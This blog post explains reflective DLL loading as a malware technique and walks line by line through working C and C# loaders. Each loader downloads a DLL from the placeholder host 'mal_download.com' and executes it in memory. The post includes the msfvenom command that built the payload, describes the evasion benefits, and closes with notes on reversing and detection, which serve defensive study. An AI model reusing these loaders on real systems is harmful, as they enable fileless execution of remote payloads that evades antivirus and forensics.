Skip to Main Content
April 25, 2024

Loading DLLs Reflections

Written by Scott Nusbaum
Malware Analysis

We're back with another post about common malware techniques. This time we're not talking about process hollowing. We are going to branch off and talk about the reflective loading of a DLL. This is a technique used to load a DLL into the memory of a process without having that DLL written disk. A similar technique is used to load Beacon Object Files (BOF) or Common Object File Format (COFF) in memory. The goal of this technique is to mimic the Windows API’s LoadLibrary function. LoadLibrary will load the DLL into the process memory space but requires that the DLL be stored someplace on the target systems disk. A benefit to not writing the DLL to disk is that it won’t be scanned by basic Anti-virus products. Another benefit is that it makes things harder for Incident Responders to identify what the contents of the DLL are.  

In this blog, we will only discuss reflective loading into the current process; however, it wouldn’t be that difficult to make modifications to allow the loading of the DLL into a remote process. In the real world, this could be used as another method to hide the malicious code by downloading the DLL with one process, then injecting it into another process, and then loading it into that process. If this is something you would like us to write a blog about, let us know on X/Twitter!

We will demonstrate this method in C and C# like we have in previous posts.

1.1      How Does it Work?

The main benefit of using a reflective loader is that the malicious DLL is never written to disk. So, we need to find a way to transfer the DLL to the program. This can be done in multiple ways including packaging in the program itself or downloading from an external site. The drawback to packaging the DLL internal to the program is that a Reverse Engineer can easily carve it out of the static binary. One of the alternatives would be to host it on an external website. This allows flexibility to change out the DLL when a different set of functionalities are needed and as seen frequently during Incident Response (IR) cases the DLL can be removed altogether from the site. Removing the DLL from the site makes IR more difficult, if not impossible, because the only way to obtain the DLL would be to dump running memory. In most cases, the program isn’t still running.

Now that we have access to the DLL in memory let’s begin making it runnable. To execute the contents of the DLL we need to allocate memory space with permissions to execute. Again, there are multiple approaches to setting up this new memory as not all sections need to have the same permissions, read, write, or execute. For the sake of simplicity, we are allocating a large chunk of memory in the size requested by the DLL at the location requested by the DLL. When I say requested by the DLL, I mean that the DLLs Optional Header holds two fields that have the size of the DLL and the preferred memory location.  The OptionalHeader contains the SizeOfImage and the ImageBase fields.

Figure 1 - IMAGE_OPTIONAL_HEADERS structure

Now that we know the preferred location and the size of the DLL, we will allocate the memory using VirtualAlloc and give it the size, requested permission, and the requested location. VirtualAlloc will attempt to allocate the requested memory location but can return a new address if there is a conflict, i.e., memory is already allocated.

We have the empty buffer with the correct size and privileges, let’s start copying over the contents of the DLL. We cannot just do a simple copy of the entire DLL since we need to adjust the locations of the sections in memory. So, we start by copying the Section Headers (MZ, PE headers) into the beginning of our new memory. Then we copy each section into the new memory with the offset (VirtualAddress) requested in its IMAGE_SECTION_HEADER structure.

Figure 2 - IMAGE_SECTION_HEADER

With the sections in place, the two remaining tasks are to Patch the Relocations and to address the Import Table.

Relocations are memory addresses stored in the DLL that refer to objects or items that are needed during execution an example would be Strings. During the creation of the DLL, the offset to these objects is known but the final full memory address is not. Before executions, these memory addresses need to be updated with the actual location in the process memory. Remember that VirtualAlloc attempts to create a memory section at a requested address. The relocations can be handled if we are provided with a different memory address. The DLL contains a table with all the needed relocation addresses. We will then iterate through these entries by adding the new memory location to the offset and overwriting that offset in the binary. We will talk about this more when walking through the code. 

The final section that will need to be addressed is the Import Table. The Import Table is used to contain all the needed external libraries that our program is dependent on to run. We will need to verify that each of these libraries is loaded into memory and update the Import Address Table with the address of each of the functions. It’s easier than it sounds and again we will walk through this in the code.

At this point, we are almost ready to use our DLL. The only remaining thing to do is to determine what function we want to call. In most cases, the DLLMain is called. Some malware will hide its functionality in other functions requiring that the calling program determines the offset and then jumps to the obfuscated address. But in most cases, the DLLMain is used. The location of the DLLMain or entrypoint is also available in the IMAGE_OPTIONAL_HEADER shown in Figure 1. We just add the offset to the buffer address, and we are good to go.

1.2      What Do the Attackers Gain?

We discussed what Reflective DLL is, an overview of how to do it, and even hinted at some of the benefits of using this technique. In this section, we will dig deeper into the benefits.

One of the primary benefits of Reflective Loading is the ability to load the DLL from memory and never touch the disk. This is key in evading some anti-virus software detections that scan all files as they are written to disc. Also, this avoids having an Incident Response team identify the DLL and reverse engineer it after the fact.

Another form of anti-forensics is downloading the DLL from a remote source. By downloading the DLL directly into memory, it makes it difficult for the defenders to gain access to the DLL. The defenders will either need to capture all traffic across the network and do SSL stripping or after the fact reach out to online resources to download a copy.  However, most of the time, the online resources are removed within days if not hours.  Hosting the resources online also allows the attackers greater flexibility in the features they use. The stager on the target system doesn’t know or care what the DLL does, it just downloads it and executes it. This allows the stager to be generic and burnable while the main code can be updated and changed.

In the previous blog, we discussed DLL Injection. To perform this, we had to load a new DLL into memory using LoadLibrary. This new DLL showed up when looking at the memory and loaded Modules for that process. If you are an experienced defender, you might know just by noticing that one library is out of place in that module list. Reflective Loading bypasses this by not using LoadLibrary and will only show up in the memory layout as an allocated heap, which is very frequent in programs. The only difference is the permission allocated to that section will include Read, Write, and Execute. These permissions can be changed by section to be stealthier, but our example doesn’t. The following image shows the execution of the C program on the left, and on the right is the memory layout for that process. The highlighted line contains our malicious DLL. As you can see it doesn’t stand out as a DLL, but it does have the protection setting to RWX (Read, Write, and Execute).

Figure 3 - Memory allocations after the reflective loader executes

The next image is of the loaded Modules in the C program. Notice that this only contains the normal libraries.

Figure 4 - Process Modules

The following image illustrates the execution of the malicious DLL, which spawns a calculator. In the console under the calculator, the output shows the memory address that was returned by the VirtualAlloc and which holds the DLL. The right shows the memory layout of the C# process.

Figure 5 - C# Memory Layout After Reflective Loader Execution

The next image shows the loaded Modules for the C# program. This is a .Net program, so it will contain a larger number of DLLs compared to the C version, but it also doesn’t contain the malicious DLLs name.

Figure 6 - C# Process Modules

1.3      Code Demonstration in C and C#

The first code sample we will be reviewing is written in C, which will download a file from the Internet. Next, it will reflectively load the new DLL into the current process and execute the malicious code by calling the DLLs DLLMain function. The DLL used in these examples was created using msfvenom -f dll -p windows/exec CMD=”c:\\windows\\system32\\calc.exe” -o spawn_calc.dll.

 While reviewing both the C and the C# code, I will be skipping over the functions used to download the remote DLL as that is not part of this blog.

-       Lines 259-269: Programs main function. 10 seconds of sleep allowing time to attach a debugger then it downloads the DLL from the provided URI and passes it to the reflective_loader function to load into the current process’s memory.

0259: int main()
0260: {
0261:     //sleep for 10 seconds
0262:     Sleep(10000);
0263: 
0264:     char* dllBytes = NULL;
0265: 
0266:     dllBytes = DownloadToBuffer("http://mal_download.com/spawn_calc.dll");
0267:     reflective_loader( dllBytes );
0268: 
0269:     free(dllBytes);

-       Line 20: Function header for reflective_loader. Takes as an argument a pointer to a memory location containing the DLL

-       Line 23-24: Sets the structure of IMAGE_DOS_HEADER to the beginning of the argument buffer. Allowing for quick access to the MZ header. Using the IMAGE_DOS_HEADER we get the offset to the PE header and set a pointer to that part of the argument buffer using the IMAGE_NT_HEADER structure. In Figure 7 the IMAGE_DOS_HEADER is highlighted in RED and the IMAGE_NT_HEADER is highlighted in BLUE. The value located at 0x1800003C, highlighted in Orange, is the offset (0xD0) to the IMAGE_NT_HEADER. 0x18000000 + 0xD0 => 0x180000D0

 0020: int reflective_loader( char* dllBytes )
0021: {
0022:     // get pointers to in-memory DLL headers
0023:     PIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)dllBytes;
0024:     PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)dllBytes +
0025:                                   dosHeaders->e_lfanew);
Figure 7 - DLLs MZ and PE headers

-       Line 27-33: Verify that DLL is not a 32-bit version. The 32-bit version contains different structure sizes, and this reflective loader was only designed for 64-bit DLLs. Contained in the structure, IMAGE_FILE_HEADER, shown in Orange in Figure 8, IMAGE_FILE_MACHINE_I386 is equal to 0x14c. As shown in RED in Figure 8 this value is 0x8664. Endianness causes the “6486” to be flipped to “8664”

Figure 8 - PE Headers Machine Type

-       Line 34: Obtains the size of the DLL as needed when expanded in Memory. The size is located in the OptionalHeader, which is located directly after the File header in the IMAGE_NT_HEADERS structure. Shown in Orange in Figure 8.

-       Line 37: Uses the size of the DLL obtained in line 34 to create a new memory region to hold the DLL with the requested location obtained from the Optional Header and the Privileges of Read, Write, and Execute. VirtualAlloc’s first parameter allows for a requested memory location. If this location is in use, it will return an alternate memory address.

-       Line 41: Because VirtualAlloc could potentially return a memory address other than the DLLs preferred location, the difference between the preferred location and the actual location needs to be calculated. This difference is used later when resolving relocations.

-       Line 45: Copies the data from the Downloaded buffer to our newly allocated memory location.

0034:     SIZE_T dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;
0035: 
0036:     // allocate new memory space for the DLL. Try to allocate memory in the image's preferred base address, but don't stress if the memory is allocated elsewhere
0037:     LPVOID dllBase = VirtualAlloc((LPVOID)ntHeaders->OptionalHeader.ImageBase,
0038:                                   dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
0039: 
0040:     // get delta between this module's image base and the DLL that was read into memory
0041:     DWORD_PTR deltaImageBase = (DWORD_PTR)dllBase - (DWORD_PTR)
0042:                                ntHeaders->OptionalHeader.ImageBase;
0043: 
0044:     // copy over DLL image headers to the newly allocated space for the DLL
0045:     memcpy(dllBase, dllBytes, ntHeaders->OptionalHeader.SizeOfHeaders);
0046: 

-       Line 48: Gets the first IMAGE_SECTION_HEADER from the array that follows directly after the OptionalHeader. IMAGE_FIRST_SECTION is a precompiler option that adds the Size of the OptionalHeader to the pointer of the OptionalHeader. The size of the header is in the FileHeader, shown in Red in Figure 9. i.e. 0x1800000E0 + 0xF0 = 0x1800001D0

-       Line 49 - 57: Loops through the array of Section Headers and copies each section into the memory offset as calculated by adding the section’s VirtualAddress to the allocated memory base location.

-       Line 51: The first section’s VirtualAddress is shown in Pink in Figure 9. i.e. 0x180000000 + 0x1000.

-       Line 53: The source is calculated by adding the allocated memory base address to the Sections.PointerToRawData, shown in Light Blue in Figure 9. i.e. 0x180000000 + 0x400


0047:     // copy over DLL image sections to the newly allocated space for the DLL
0048:     PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHeaders);
0049:     for (size_t i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
0050:     {
0051:         LPVOID sectionDestination = (LPVOID)((DWORD_PTR)dllBase +
0052:                                              (DWORD_PTR)section->VirtualAddress);
0053:         LPVOID sectionBytes = (LPVOID)((DWORD_PTR)dllBytes + (DWORD_PTR)
0054:                                        section->PointerToRawData);
0055:         memcpy(sectionDestination, sectionBytes, section->SizeOfRawData);
0056:         section++;
0057:     }
0058: 
Figure 9 - PE Headers IMAGE_SECTION_HEADER

-       Line 60-95: In this section, we will patch all the relocation addresses with the location that was returned by the VirtualAlloc.

-       Line 60: Parse the OptionalHeader strut to get access to the IMAGE_DATA_DIRECTORY structure that holds the offset to the relocation Table structure. In Figure 10, The highlighted Blue and Red squares represent the IMAGE_DATA_DIRECTORY

-       Line 62: Gets a pointer to the relocation table by adding the VirtualAddress from the IMAGE_DATA_DIRECTORY to the base address.

-       Line 65: Loop until the current size of processed relocation blocks is less than the size listed in the IMAGE_DATA_DIRECTORY struct shown in Red in Figure 10. In this example, the size is zero and the loop is skipped.

-       Line 67 - 72: Uses the relocation table pointer to find the next relocation block, then increments the processed count. Next, we calculate the BASE_RELOCATION_ENTRY by adding the Relocation Table pointer to the relocations size that we’ve processed.

-       Line 74 - 93: Loops through the BASE_RELOCATION_ENTRY structure to update all pointers that are not of type 0.

-       Line 84: Gets the address offset of the memory location that needs to be edited.

-       Line 87: Reads the value of that address and stores it in the addressToPatch.

-       Line 90: Adds the addressToPatch value to the delta offset calculated on Line 41.

-       Line 91 Writes the new value back into the original spot.

0059:     // perform image base relocations
0060:     IMAGE_DATA_DIRECTORY relocations =
0061:         ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
0062:     DWORD_PTR relocationTable = relocations.VirtualAddress + (DWORD_PTR)dllBase;
0063:     DWORD relocationsProcessed = 0;
0064: 
0065:     while (relocationsProcessed < relocations.Size)
0066:     {
0067:         PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)(
0068:                 relocationTable + relocationsProcessed);
0069:         relocationsProcessed += sizeof(BASE_RELOCATION_BLOCK);
0070:         DWORD relocationsCount = (relocationBlock->BlockSize - sizeof(
0071:                                       BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
0072:         PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)(
0073:                 relocationTable + relocationsProcessed);
0074: 
0075:         for (DWORD i = 0; i < relocationsCount; i++)
0076:         {
0077:             relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
0078: 
0079:             if (relocationEntries[i].Type == 0)
0080:             {
0081:                 continue;
0082:             }
0083: 
0084:             DWORD_PTR relocationRVA = relocationBlock->PageAddress +
0085:                                       relocationEntries[i].Offset;
0086:             DWORD_PTR addressToPatch = 0;
0087:             ReadProcessMemory(GetCurrentProcess(),
0088:                               (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch,
0089:                               sizeof(DWORD_PTR), NULL);
0090:             addressToPatch += deltaImageBase;
0091:             memcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch,
0092:                    sizeof(DWORD_PTR));
0093:         }
0094:     }
0095: 
Figure 10 - PE Header Relocations

-       Line 96 - 135: This section parses the DLLs Import Table and loads into memory any dependencies.

-       Line 98: Set a pointer to the IMAGE_DATA_DIRCTORY that contains the import data. Data structure. Offset IMAGE_DIRECTORY_ENTRY_IMPORT which is the second structure in the array of IMAGE_DATA_DIRCTORY structures. This structure is highlighted in Red in Figure11.

-       Line 99: Uses the directory data structure from line 98 to calculate the address of the IMAGE_IMPORT_DESCRITPOR structure.  0x180000000+0x21B8. See the highlighted Red section of Figure 11 for the IMAGE_IMPORT_DESCRIPTOR structure.

-       Line 105: Iterates through the Names of the import Descriptor until it fails to find another. These names are the names of the DLL to be loaded. In our example, the only one is Kernel32.dll. The calculation to derive the Name is shown highlighted in Blue in Figure 11. The virtual address highlighted at 0x1800031c4, when added to the base address of 0x180000000 + 0x233a, is the address highlighted at 0x18000233a which is the ASCII for Kernel32.dll.

-       Line 108: LoadLibraryA is then used to load this common Windows DLL into memory if is not already loaded and returns the address of the library in memory.

-       Line 115 - 131: Iterates through the list of functions within the loaded library that are used in our malicious DLL and updates the addresses.

-       Line 113: Stores the address of the First IMAGE_THUNK_DATA. This is a union structure so it can hold multiple values in the same memory location.

-       Line 115: Loops if the virtual address of the data is not empty.

-       Line 117 - 121: Process the Thunk if it’s of the ordinal type. This is when it’s referenced with an index value rather than an ASCII name.

-       Line 123 - 128: Process the thunk and save the updated address of the function if the Thunk uses the file name. Shown highlighted in Orange in Figure 12 is the Linked process. First, the offset is retrieved from 0x1800021b0, which points to the first Thunk, at 0x1800021e0. This structure then contains the offset, 0x2250, which points to the ASCII string located. 0x180002250 “CloseHandle”

0096:     // resolve import address table
0097:     PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
0098:     IMAGE_DATA_DIRECTORY importsDirectory =
0099:         ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
0100:     importDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress
0101:                        + (DWORD_PTR)dllBase);
0102:     LPCSTR libraryName = "";
0103:     HMODULE library = NULL;
0104: 
0105:     while (importDescriptor->Name != NULL)
0106:     {
0107:         libraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)dllBase;
0108:         library = LoadLibraryA(libraryName);
0109: 
0110:         if (library)
0111:         {
0112:             PIMAGE_THUNK_DATA thunk = NULL;
0113:             thunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)dllBase + importDescriptor->FirstThunk);
0114: 
0115:             while (thunk->u1.AddressOfData != NULL)
0116:             {
0117:                 if (IMAGE_SNAP_BY_ORDINAL(thunk->u1.Ordinal))
0118:                 {
0119:                     LPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(thunk->u1.Ordinal);
0120:                     thunk->u1.Function = (DWORD_PTR)GetProcAddress(library, functionOrdinal);
0121:                 }
0122:                 else
0123:                 {
0124:                     PIMAGE_IMPORT_BY_NAME functionName = (PIMAGE_IMPORT_BY_NAME)((
0125:                             DWORD_PTR)dllBase + thunk->u1.AddressOfData);
0126:                     DWORD_PTR functionAddress = (DWORD_PTR)GetProcAddress(library,
0127:                                                 functionName->Name);
0128:                     thunk->u1.Function = functionAddress;
0129:                 }
0130:                 ++thunk;
0131:             }
0132:         }
0133: 
0134:         importDescriptor++;
0135:     }
0136: 
Figure 11 - Import Table Offsets

The following figure shows the memory structure in Ghidra of the raw unpatched import table.

Figure 12 - Unpatched Import Table From Ghidra

Now, let’s look in X64Dbg at the patched memory after the reflective loader has been executed.

Figure 13 - Patched Import Table From X64Dbg

-       Line 138: Calculates the Entry address or DLLMain for the DLL based on the OptionalHeader and the memory address. Save this address as a function pointer with three (3) parameters, since DLLMain takes three paramters. AddressOfEntryPoint is shown in Red in Figure 13.

-       Line 140: Call the function point with the needed arguments to execute the malicious payload.

0137:     // execute the loaded DLL
0138:     void (*DLLEntry)(HINSTANCE, DWORD,
0139:                      LPVOID) = (DWORD_PTR)dllBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
0140:     (*DLLEntry)((HINSTANCE)dllBase, DLL_PROCESS_ATTACH, 0);
0141: 
0142:     return 0;
0143: }
0271:     return 0;
Figure 14 - PE Header Determine the EntryPoint

The next code excerpt is in C# and performs the same actions as the C code above. We not going to walk through the C# code line by line this time. It’s almost a direct port of the C code. The C# code is wrapped in an unsafe tag, which allows us to use memory unsafe direct pointers. The main difference between the two code samples is that we needed to define each of the structures, and we had to do typecasting.

The following code is divided into groups to match those from the C section.

Main Class

    10	unsafe class Program
    11	{
….
   214	  static void Main(string[] args)
   215	  {
   216	    byte[] dllBytes;
   217	    dllBytes =
   218	        DownloadToBuffer("http://mal_download.com/spawn_calc.dll");
   219	    reflective_loader(dllBytes);
   220	  }
   221	} 

The reflective_loader function differs in that the input was a memory-safe byte[] and was then copied to a new unsafe memory location.

38	  static void reflective_loader(byte[] dllBytes)
    39	  {
    40	    void *buffer =  Win32.VirtualAlloc(IntPtr.Zero,
    41	                                       (uint)dllBytes.Length,
    42	                                       (uint)(Win32.AllocationTypeFlags.MEM_RESERVE |
    43	                                         Win32.AllocationTypeFlags.MEM_COMMIT),
    44	                                       (uint)Win32.MemoryProtectFlags.PAGE_READWRITE);
    45	    if(buffer ==  null)
    46	    {
    47	      Console.WriteLine("Error not alloced correctly {0:x}",
    48	                        Win32.GetLastError());
    49	      return;
    50	    }
    51	    fixed(byte *p = dllBytes)
    52	    {
    53	      UIntPtr buffer_sz = new UIntPtr((ulong)dllBytes.Length);
    54	      Win32.memcpy(buffer, p, buffer_sz);
    55	    }
    56	
    57	    Win32.IMAGE_DOS_HEADER *dosHeaders = (Win32.IMAGE_DOS_HEADER *)
    58	                                         buffer;
    59	    Win32.IMAGE_NT_HEADERS64 *ntHeaders = (Win32.IMAGE_NT_HEADERS64 *)
    60	                                          ((
    61	                                              byte *)buffer + dosHeaders->e_lfanew);
    62	
    63	    if(ntHeaders->FileHeader.Machine == (ushort)
    64	        Win32.CHIPARCH.IMAGE_FILE_MACHINE_I386)
    65	    {
    66	      Console.WriteLine("Invalid DLL version. Only supports x64");
    67	      return;
    68	    }
    69	

Allocate the final memory unsafe allocation that will hold the final DLL with the Read, Write, and execute permissions.

70	    uint dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;
    71	
    72	    // allocate new memory space for the DLL. Try to allocate memory in the image's preferred base address, but don't stress if the memory is allocated elsewhere
    73	    void *dllBase = Win32.VirtualAlloc((IntPtr)
    74	                                       ntHeaders->OptionalHeader.ImageBase,
    75	                                       dllImageSize, (uint)(Win32.AllocationTypeFlags.MEM_RESERVE |
    76	                                         Win32.AllocationTypeFlags.MEM_COMMIT),
    77	                                       (uint)Win32.MemoryProtectFlags.PAGE_EXECUTE_READWRITE);
    78	    if(dllBase ==  null)
    79	    {
    80	      Console.WriteLine("Error not alloced correctly {0:x}",
    81	                        Win32.GetLastError());
    82	      return;
    83	    }
    84	    Console.WriteLine("Memory location 0x{0:X}",
    85	                      (ulong)((byte *)dllBase));
    86	
    87	    // get delta between this module's image base and the DLL that was read into memory
    88	    ulong deltaImageBase = (ulong)&dllBase -
    89	                           ntHeaders->OptionalHeader.ImageBase;
    90	
    91	    // copy over DLL image headers to the newly allocated space for the DLL
    92	    Win32.memcpy(dllBase, buffer,
    93	                 new UIntPtr(ntHeaders->OptionalHeader.SizeOfHeaders));
    94	

 Copy each section into the new memory buffer with the corrected offsets. 

    95	    // copy over DLL image sections to the newly allocated space for the DLL
    96	    Win32.IMAGE_SECTION_HEADER *section = IMAGE_FIRST_SECTION(
    97	        ntHeaders);
    98	    for(uint i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
    99	    {
   100	      void *sectionDestination = (void *)((byte *)dllBase +
   101	                                          section->VirtualAddress);
   102	      void *sectionBytes = (void *)((byte *)buffer +
   103	                                    section->PointerToRawData);
   104	      Win32.memcpy(sectionDestination, sectionBytes,
   105	                   new UIntPtr(section->SizeOfRawData));
   106	      section++;
   107	    }
   108	 

Update all the Relocations with the new memory address.

109	    // perform image base relocations
   110	    Win32.IMAGE_DATA_DIRECTORY relocations =
   111	        ntHeaders->OptionalHeader.BaseRelocationTable;
   112	    void *relocationTable = relocations.VirtualAddress +
   113	                            (byte *)dllBase;
   114	    uint relocationsProcessed = 0;
   115	
   116	    // TODO Test this wheile loop. Current sample doesnt have a relocation table
   117	    while(relocationsProcessed < relocations.Size)
   118	    {
   119	      Win32.BASE_RELOCATION_BLOCK *relocationBlock =
   120	          (Win32.BASE_RELOCATION_BLOCK *)((
   121	                                              byte *)relocationTable + relocationsProcessed);
   122	      relocationsProcessed += (uint)sizeof(Win32.BASE_RELOCATION_BLOCK);
   123	      uint relocationsCount = (uint)((relocationBlock->BlockSize -
   124	                                      sizeof(
   125	                                          Win32.BASE_RELOCATION_BLOCK)) / sizeof(
   126	                                         Win32.BASE_RELOCATION_ENTRY));
   127	      Win32.BASE_RELOCATION_ENTRY *relocationEntries =
   128	          (Win32.BASE_RELOCATION_ENTRY *)
   129	          ((byte *)relocationTable + relocationsProcessed);
   130	
   131	      for(uint i = 0; i < relocationsCount; i++)
   132	      {
   133	        relocationsProcessed += (uint)sizeof(Win32.BASE_RELOCATION_ENTRY);
   134	
   135	        if(relocationEntries[i].Type == 0)
   136	        {
   137	          continue;
   138	        }
   139	
   140	        uint relocationRVA = relocationBlock->PageAddress +
   141	                             relocationEntries[i].Offset;
   142	        uint addressToPatch = 0;
   143	        IntPtr tmp = new IntPtr(0);
   144	        Win32.ReadProcessMemory(Win32.GetCurrentProcess(),
   145	                                new IntPtr((byte *)dllBase + relocationRVA),
   146	                                new IntPtr(&addressToPatch),
   147	                                sizeof(void *), out tmp);
   148	        addressToPatch += (uint)deltaImageBase;
   149	        Win32.memcpy(((byte *)dllBase + relocationRVA), &addressToPatch,
   150	                     new UIntPtr((ulong)sizeof(void *)));
   151	      }
   152	    }
   153	

Load any dependencies using LoadLibrary and update the function pointers.

154	    // resolve import address table
   155	    Win32.IMAGE_IMPORT_DESCRIPTOR *importDescriptor = null;
   156	    Win32.IMAGE_DATA_DIRECTORY *importsDirectory =
   157	        (Win32.IMAGE_DATA_DIRECTORY *)
   158	        &ntHeaders->OptionalHeader.ImportTable;
   159	    importDescriptor = (Win32.IMAGE_IMPORT_DESCRIPTOR *)(
   160	                           importsDirectory->VirtualAddress + (byte *)dllBase);
   161	    byte *libraryName = null;
   162	    IntPtr library = IntPtr.Zero;
   163	    while(importDescriptor->Name != 0)
   164	    {
   165	      libraryName = importDescriptor->Name + (byte *)dllBase;
   166	      library = (IntPtr)Win32.LoadLibrary((char *)libraryName);
   167	
   168	      if(library != IntPtr.Zero)
   169	      {
   170	        Win32.IMAGE_THUNK_DATA *thunk = null;
   171	        thunk = (Win32.IMAGE_THUNK_DATA *)((byte *)dllBase +
   172	                                           importDescriptor->FirstThunk);
   173	
   174	        while(thunk->AddressOfData != 0)
   175	        {
   176	          {
   177	            Win32.IMAGE_IMPORT_BY_NAME *functionName =
   178	                (Win32.IMAGE_IMPORT_BY_NAME *)((
   179	                                                   byte *)dllBase + thunk->AddressOfData);
   180	            void *functionAddress = (void *)Win32.GetProcAddress(library,
   181	                                    functionName->Name);
   182	            thunk->Function = (UInt64)functionAddress;
   183	          }
   184	          ++thunk;
   185	        }
   186	      }
   187	
   188	      importDescriptor++;
   189	    }
   190	

Create a function delegate to act as the function pointer from C. Calculate the offset to the entry point and call the DLLMain.

191	    int DLL_PROCESS_ATTACH = 1;
   192	    // execute the loaded DLL
   193	    tmpFuncDelegate foo = (tmpFuncDelegate)
   194	                          Marshal.GetDelegateForFunctionPointer(
   195	                              new IntPtr((byte *)dllBase +
   196	                                         ntHeaders->OptionalHeader.AddressOfEntryPoint),
   197	                              typeof(tmpFuncDelegate));
   198	
   199	    Console.WriteLine("Sleeping to capture memory image");
   200	    Thread.Sleep(40000);
   201	    Console.WriteLine("Finished Sleeping ");
   202	
   203	    foo((byte *)dllBase, DLL_PROCESS_ATTACH, null);
   204	
   205	    Console.WriteLine("Press 'q' to exit");
   206	    while(Console.ReadKey().Key != ConsoleKey.Q) {}
   207	
   208	    Win32.VirtualFree(dllBase, (uint)dllImageSize,
   209	                      (uint)Win32.AllocationTypeFlags.MEM_RELEASE);
   210	    Win32.VirtualFree(buffer, (uint)dllBytes.Length,
   211	                      (uint)Win32.AllocationTypeFlags.MEM_RELEASE);
   212	  }

1.4      Reversing the Code

The C code we discussed earlier was compiled into a Windows 64-bit executable using MinGW, then disassembled and decompiled with Ghidra. As you can see below, the Ghidra-generated source code is a very close match to the original. 

The figure below is the Ghidra decompilation of the first sample. As you can see, it does a pretty good job. Again, we didn’t implement any type of anti-forensic or obfuscation.

Figure 15 - Decompilation of C Main function
Figure 16 - Decompilation of the reflective_loader Function

Reversing most C# code is simple with the tool, dnSpy. There are methods to hide or corrupt the .exe so that dnSpy cannot decompile it, but for the most part, attackers do not go to that extent.

To load the executable in dnSpy, simply drag and drop it onto the left pane. Once loaded, the pane will provide a tree listing of the components of the .exe.

The following image is the reflective_loader example as shown in dnSpy. Again, it’s very close to the original.

Figure 17 - DnSpy Generated Source Code for Main Function
Figure 18 - DnSpy Generated Source Code for the reflective_loader Function
Figure 19 - DnSpy Generated Source Code for the reflective_loader Function

1.5      Conclusion

Reflective Loaders are a great tool for attackers and a pain for defenders. Some of the ways that defenders can detect or prevent would be to identify new memory allocations that are created with RWX permissions. Most allocated memory does not need the execute permission. Another item would be to monitor and capture network traffic; however, this isn’t practical as it would involve implementing SLL stripping and storage of large amounts of data. 

During the testing of these samples, Windows Defender did not flag any of the stagers but did flag the DLLs execution in memory. The DLL was flagged because it was a generic Metasploit-generated payload.